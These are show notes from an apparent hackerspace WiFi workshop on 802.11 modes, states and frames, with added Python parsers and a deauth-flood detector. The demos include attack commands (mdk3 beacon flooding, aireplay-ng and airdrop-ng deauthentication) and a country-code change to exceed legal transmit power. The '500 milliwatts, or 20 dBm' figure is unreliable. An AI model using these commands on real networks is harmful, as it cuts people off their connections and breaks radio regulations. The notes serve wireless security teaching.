This time on the show, part 2 of our WiFi from-the-ground-up series. Darren presents a wireless workshop at the Noisebridge hackerspace in San Francisco.


6 Modes of WiFi
---------------
Master - Access Point or Base Station
Managed - Infrastructure Mode (Client)

	Demo: Managed
	-------------
	iwconfig wlan0 mode managed
	iwconfig wlan0 essid pineapple
	iwconfig wlan0
	*more on associations soon

Ad-Hoc - peer to peer

	Demo: Ad-Hoc
	------------
	iwconfig wlan0 channel 1 essid myadhocnetwork mode ad-hoc

Mesh - Mesh Cloud/Network. Planned Ad-hoc
Repeater - Range Extender
Monitor (RFMON)

	Demo: Monitor Mode
	------------------
	airmon-ng start wlan2
	tshark -i mon0


Modes and your NIC
------------------
Not all wireless NICs are made the same. 
Depending on chipset and other factors your adapter may not support all 6 modes.

	Demo: Determine your NIC's available modes
	------------------------------------------
	airmon-ng # find phy#
	iw phy phy1 info | grep -A8 modes
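
The `grep -A8 modes` line above just eyeballs the "Supported interface modes" block of `iw phy` output. The following is an added Python example, not code from the episode or from the iw tool, that parses that block from a constructed excerpt in the shape `iw phy <phyN> info` prints and maps iw's mode names onto the iwconfig mode names used in this workshop, so a script can answer "can this NIC do Monitor or Master?" before you reach for airmon-ng. `modes_of_phy` runs the real command and assumes a Linux box with iw installed.

```python
# Added example (not from the episode): parse the "Supported interface modes"
# block of `iw phy <phyN> info` and map iw's names onto the modes listed above.
# SAMPLE_IW_OUTPUT is a constructed excerpt in the shape iw prints.
import re
import subprocess

SAMPLE_IW_OUTPUT = """\
Wiphy phy1
	max # scan SSIDs: 4
	Supported interface modes:
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor
		 * mesh point
	Band 1:
		Capabilities: 0x1ff
"""

# iw's interface-mode names versus the mode names iwconfig uses.
# Repeater has no iw equivalent: it is a driver/bridging feature, not a phy mode.
IW_TO_IWCONFIG = {
    "managed": "Managed",
    "IBSS": "Ad-Hoc",
    "AP": "Master",
    "monitor": "Monitor",
    "mesh point": "Mesh",
}

def parse_supported_modes(iw_info: str) -> list[str]:
    """Return the iw mode names listed under 'Supported interface modes:'."""
    modes = []
    in_block = False
    for line in iw_info.splitlines():
        if line.strip() == "Supported interface modes:":
            in_block = True
            continue
        if in_block:
            m = re.match(r"\s*\*\s+(.+?)\s*$", line)
            if m:
                modes.append(m.group(1))
            else:
                break  # first non-bullet line ends the block
    return modes

def iwconfig_modes(iw_info: str) -> dict[str, bool]:
    """Map each iwconfig mode name to whether the phy reports support for it."""
    supported = set(parse_supported_modes(iw_info))
    return {name: iw_name in supported for iw_name, name in IW_TO_IWCONFIG.items()}

def modes_of_phy(phy: str = "phy1") -> dict[str, bool]:
    """Query a real phy (assumes Linux with iw installed; no root needed)."""
    out = subprocess.run(["iw", "phy", phy, "info"],
                         capture_output=True, text=True, check=True).stdout
    return iwconfig_modes(out)

if __name__ == "__main__":
    for mode, ok in iwconfig_modes(SAMPLE_IW_OUTPUT).items():
        print(f"{mode:8s} {'yes' if ok else 'no'}")
```

The parser stops at the first line that is not a `*` bullet, which is how iw delimits the block; a phy that lists only `managed` will report Monitor and Master as unsupported.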


A Word On Transmit Power
------------------------
Like channels, transmit power (txpower) is regulated by country.
In the US, txpower has a max of 500 milliwatts, or 20 dBm
This is hard-coded into the Linux kernel (though it can be changed)
Easier than changing the kernel is to move to a country with nicer laws

	Demo: Moving to Bolivia
	-----------------------
	iw reg get
	iw reg set BO
	iwconfig wlan2 txpower 30

3 States of WiFi
----------------

State 1: Unauthenticated and Unassociated
State 2: Authenticated but Unassociated
State 3: Authenticated and Associated
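
The three states form a small state machine, and the rules for moving between them are what the deauthentication demos later in this workshop abuse. This is an added Python example (not part of the show notes) that models a client as the access point sees it: authentication moves 1 to 2, association 2 to 3, disassociation 3 to 2, and deauthentication drops to 1 from any state; data frames are only legal in state 3. The station MAC and event sequence are constructed.

```python
# Added example (not from the episode): the 802.11 client state machine.
# State 1: unauthenticated, unassociated; State 2: authenticated, unassociated;
# State 3: authenticated, associated. Only state 3 may carry data frames.

UNAUTH_UNASSOC, AUTH_UNASSOC, AUTH_ASSOC = 1, 2, 3

class Station:
    """Tracks one client's 802.11 state as seen from an access point."""

    def __init__(self, mac: str):
        self.mac = mac
        self.state = UNAUTH_UNASSOC
        self.log: list[str] = []

    def _move(self, event: str, new_state: int) -> int:
        self.log.append(f"{self.mac}: {event}: state {self.state} -> {new_state}")
        self.state = new_state
        return self.state

    def authenticate(self) -> int:
        if self.state == UNAUTH_UNASSOC:
            return self._move("auth", AUTH_UNASSOC)
        return self.state  # already authenticated: nothing changes

    def associate(self) -> int:
        if self.state == AUTH_UNASSOC:
            return self._move("assoc", AUTH_ASSOC)
        if self.state == UNAUTH_UNASSOC:
            # An AP rejects association from a station that never authenticated.
            raise PermissionError("association request from unauthenticated station")
        return self.state

    def disassociate(self) -> int:
        if self.state == AUTH_ASSOC:
            return self._move("disassoc", AUTH_UNASSOC)
        return self.state

    def deauthenticate(self) -> int:
        # Legal from any state and always returns the station to state 1,
        # which is why one forged deauth frame ends a session.
        return self._move("deauth", UNAUTH_UNASSOC)

    def can_send_data(self) -> bool:
        return self.state == AUTH_ASSOC

def replay(mac: str, events: list[str]) -> tuple[int, list[str]]:
    """Run a sequence of events through one station; return final state and log."""
    sta = Station(mac)
    handlers = {
        "auth": sta.authenticate,
        "assoc": sta.associate,
        "disassoc": sta.disassociate,
        "deauth": sta.deauthenticate,
    }
    for ev in events:
        handlers[ev]()
    return sta.state, sta.log

if __name__ == "__main__":
    # Constructed sequence: a normal join, then a deauth mid-session.
    state, log = replay("a0:0b:ba:ba:6a:ca", ["auth", "assoc", "deauth"])
    print("\n".join(log))
    print("final state:", state)
```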


WiFi Frames
-----------

Frames: Simply Data Packets
	Typically made up of: Header, Payload, Integrity Check (CRC)
Frame Header:
	Source and Destination
	Ether Type (What Protocol)
Frame Check Sequence:
	CRC
	Say that again?

WiFi Frames:
	Management Frames
	Control Frames
	Data Frames

Management Frames:
	Beacons
	Probes
	Authentications
	Associations

Beacons:
Advertise the network
Specify SSID (network name), Channels and other capabilities

	Demo: Beacon Flood Attack
	-------------------------

	airmon-ng start wlan2
	mdk3 mon0 b -f ssidlist.txt

	Demo: Analyze Beacon Frame
	--------------------------
	gksudo wireshark & disown
	wlan.fc.subtype == 0x08
	# IEEE 802.11 Beacon Frame > Frame Control > Type Management > Subtype 8
	# IEEE 802.11 Management Frame > Tagged parameters
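
To make the Wireshark tree above concrete, here is an added Python example, not code from the episode or from any tool it uses, that decodes the 802.11 MAC header and the bodies of a beacon, a probe request and a deauthentication frame. The frames are constructed byte strings that reuse the pineapple and phone MAC addresses from the demos. It also computes the combined value Wireshark exposes as `wlan.fc.type_subtype`: the filter `wlan.fc.subtype == 0x08` above tests the subtype field alone, so it also matches QoS Data frames (type 2, subtype 8), whereas `wlan.fc.type_subtype == 0x08` matches beacons only.

```python
# Added example (not from the episode): minimal 802.11 management frame parser.
# Header layout: Frame Control (2) | Duration (2) | Addr1 | Addr2 | Addr3 | Seq (2),
# i.e. 24 bytes, then the frame body. Frame Control byte 0 packs
# version (bits 0-1), type (bits 2-3) and subtype (bits 4-7).
import struct

TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
                 8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def fc_type_subtype(frame: bytes) -> int:
    """Same combined value Wireshark shows as wlan.fc.type_subtype."""
    fc0 = frame[0]
    return (((fc0 >> 2) & 0x3) << 4) | ((fc0 >> 4) & 0xF)

def parse_tags(body: bytes) -> dict[int, bytes]:
    """Walk the tag/length/value list ("Tagged parameters" in Wireshark)."""
    tags, i = {}, 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            raise ValueError("truncated tagged parameter")
        tags[tag] = value
        i += 2 + length
    return tags

def parse_frame(frame: bytes) -> dict:
    if len(frame) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF
    info = {"type": TYPE_NAMES.get(ftype, "reserved"), "subtype": subtype,
            "to_ds": bool(fc1 & 0x01), "from_ds": bool(fc1 & 0x02),
            "addr1": mac_str(frame[4:10]), "addr2": mac_str(frame[10:16]),
            "addr3": mac_str(frame[16:22])}
    if ftype != 0:
        return info  # control and data bodies are out of scope here
    info["name"] = MGMT_SUBTYPES.get(subtype, f"mgmt-{subtype}")
    body = frame[24:]
    if subtype in (8, 5):  # beacon / probe response: fixed fields come first
        _timestamp, interval, cap = struct.unpack("<QHH", body[:12])
        info["beacon_interval_tu"] = interval
        info["privacy"] = bool(cap & 0x0010)  # Capability bit 4: encryption in use
        tags = parse_tags(body[12:])
    elif subtype == 4:  # probe request: tagged parameters only
        tags = parse_tags(body)
    elif subtype in (10, 12):  # disassoc / deauth carry just a reason code
        info["reason"] = struct.unpack("<H", body[:2])[0]
        return info
    else:
        return info
    if 0 in tags:
        info["ssid"] = tags[0].decode("utf-8", "replace")
        info["wildcard_ssid"] = len(tags[0]) == 0  # the "null probe" from the demos
    if 3 in tags and len(tags[3]) == 1:
        info["channel"] = tags[3][0]  # DS Parameter Set
    return info

# Constructed sample frames using the MACs from the demos above.
BSSID = bytes.fromhex("00c0ca60532e")
PHONE = bytes.fromhex("a00bbaba6aca")
BCAST = b"\xff" * 6

def mac_header(fc0: int, addr1: bytes, addr2: bytes, addr3: bytes) -> bytes:
    return bytes([fc0, 0x00]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00"

BEACON = (mac_header(0x80, BCAST, BSSID, BSSID)
          + struct.pack("<QHH", 0, 100, 0x0401)        # timestamp, 100 TU, open ESS
          + b"\x00\x09pineapple"                        # tag 0: SSID
          + b"\x01\x04\x82\x84\x8b\x96"                 # tag 1: supported rates
          + b"\x03\x01\x0b")                            # tag 3: channel 11
NULL_PROBE = mac_header(0x40, BCAST, PHONE, BCAST) + b"\x00\x00" + b"\x01\x04\x82\x84\x8b\x96"
DEAUTH = mac_header(0xC0, PHONE, BSSID, BSSID) + struct.pack("<H", 7)

if __name__ == "__main__":
    for f in (BEACON, NULL_PROBE, DEAUTH):
        print(hex(fc_type_subtype(f)), parse_frame(f))
```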

Probe Frame
	Probe Request - Are you my friend?
	Probe Response
		- Includes capability info

	Demo: Is that a probe in your pocket or are you just happy to see me?
	---------------------------------------------------------------------
	# Look what's coming out of everyone's devices!
	airmon-ng start wlan2
	airodump-ng mon0


Authentication
	Authentication
		- Open, WEP (Shared), WPA, WPA2, WPA-Radius
	Deauthentication

Association
	Association Request - Can we be friends?
	Association Response
	Disassociation

	Demo: Analyze Connection to Open AP
	-----------------------------------

	# start wireshark on wlan2
	# Silence the noise!
	wlan.addr == 00:c0:ca:54:51:ef and not wlan.fc.subtype == 0x08

	# Passive Scan should not generate any frames
	iw dev wlan2 scan passive | grep SSID

	# Active Scan
	iw wlan2 scan | grep SSID
	Display only REQUESTS by updating wireshark filter to include "and wlan.fc.subtype == 0x04"
	Display only RESPONSES by changing 0x04 to 0x05

	airmon-ng start wlan2
	airodump-ng mon0
	# find channel for AP "pineapple"
	iwconfig wlan2 channel 11
	iwconfig mon0 channel 11
	iwconfig wlan2 | grep Frequency
	gksudo wireshark & disown

	# Filter for just pineapple and not beacons
	wlan.addr == 00:C0:CA:60:53:2E and not wlan.fc.subtype == 0x08
	# Associate
	# Filter for just phone and pineapple
	wlan.addr == 00:C0:CA:60:53:2E and wlan.addr == a0:0b:ba:ba:6a:ca
	# Probe Request SSID=Broadcast = null probe request

Deauthentication
----------------
Remember trust?

	Demo: Deauthenticate my phone!
	------------------------------
	iwconfig mon0 channel 11
	aireplay-ng -0 10 -a 00:C0:CA:60:53:2E -c A0:0B:BA:BA:6A:CA mon0

	Demo: Hella Deauthentication with Airdrop-ng
	--------------------------------------------
	# Begin demo connected to anything but pineapple
	airodump-ng --output-format csv --write /root/dump.csv mon0
	airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules
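
The two demos above are exactly what a wireless IDS is built to catch. This is an added Python example, not from the episode, that runs a rate-based deauth/disassoc flood detector over a constructed capture of already-parsed frames (timestamps in seconds): it alerts once for any (sender, target) pair that sees more than five deauthentication or disassociation frames within two seconds, which separates a burst like the `aireplay-ng -0 10` run above from the single legitimate disassociation a roaming client sends. The MAC addresses are the ones from the demos; thresholds and reason codes are constructed. Rate limits only detect; the fix is 802.11w protected management frames, which let the AP and client authenticate deauth and disassoc frames and drop forged ones.

```python
# Added example (not from the episode): sliding-window deauth flood detector.
# Frames are (t, name, addr1, addr2, reason): addr1 is the destination (the
# station being kicked), addr2 the apparent sender.
from collections import defaultdict, deque

WINDOW = 2.0    # seconds
THRESHOLD = 5   # deauth/disassoc frames per pair per window before alerting

AP = "00:c0:ca:60:53:2e"
PHONE = "a0:0b:ba:ba:6a:ca"

# Constructed capture: quiet network with one genuine roam (reason 8, leaving BSS),
# then ten deauths 50 ms apart aimed at one client, as the demo above produces.
FRAMES = [
    (0.00, "beacon", "ff:ff:ff:ff:ff:ff", AP, None),
    (0.10, "beacon", "ff:ff:ff:ff:ff:ff", AP, None),
    (0.50, "disassoc", PHONE, AP, 8),
    (5.00, "beacon", "ff:ff:ff:ff:ff:ff", AP, None),
] + [(5.20 + 0.05 * i, "deauth", PHONE, AP, 7) for i in range(10)]

def detect_deauth_floods(frames, window=WINDOW, threshold=THRESHOLD):
    """Return alerts as (time, sender, target, count) tuples.

    frames must be sorted by time. One alert is raised per (sender, target)
    pair the first time its count inside the window exceeds the threshold.
    """
    recent = defaultdict(deque)   # (sender, target) -> timestamps inside window
    alerted = set()
    alerts = []
    for t, name, dst, src, _reason in frames:
        if name not in ("deauth", "disassoc"):
            continue
        key = (src, dst)
        q = recent[key]
        q.append(t)
        while q and t - q[0] > window:   # expire frames older than the window
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append((t, src, dst, len(q)))
    return alerts

if __name__ == "__main__":
    for t, src, dst, n in detect_deauth_floods(FRAMES):
        print(f"t={t:.2f}s deauth flood: {n} frames from {src} to {dst}")
```

A broadcast deauth (target ff:ff:ff:ff:ff:ff, what aireplay-ng sends without `-c`) shows up as its own pair and is caught the same way. The threshold is deliberately low because a real AP almost never sends more than one or two deauth frames to a client in a row.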

Control Frames:
---------------
Request to Send - RTS: Can I speak?
Clear to Send - CTS: Sure! Everyone else shut up.
Acknowledgement - ACK: Cool, I got what you said ok.


Data Frames:
------------
Kittens!

5 Comments

  • pixelateddwarf 2 years ago

    getting 404s on the download links for the last 2 episodes.

  • Jack Kirby 2 years ago

    I got through all the very technical stuff on Wi-Fi and I am still alive. :P

    Thanks Darren for making it easy to understand.

  • Angel 2 years ago

    Nice !!!

  • Jennifer 1 year ago

    Darren was incorrect. With a ham license you CAN exceed the 500mW limit of wifi. According to the American Radio Relay League’s (ARRL) band plan chart all license classes are allowed full amateur privileges between 2390-2450 MHz (among GHz bands). That covers wifi channels 1 through 8. Transmit power with an amateur license is limited to 1500 watts! :D You do of course have to abide by all the rules of amateur radio. You have to give out your call sign at the end of every transmission or every 10 minutes. One trick I read about is converting your call sign to hexadecimal and using that as your MAC address. I would also change your host name to your call sign. You also aren’t allowed to send encrypted messages except control commands to a space station or radio controlled craft. So your wifi would have to be wide open. Accessing things like Gmail might not be legal since it uses encryption. Since I have a ham license, I think I want to get a one watt Alfa and move to Bolivia :D I also want to find a higher wattage wifi device I can run as an access point or do ad-hoc mode with. There are wifi amplifiers out there, they are however rather expensive.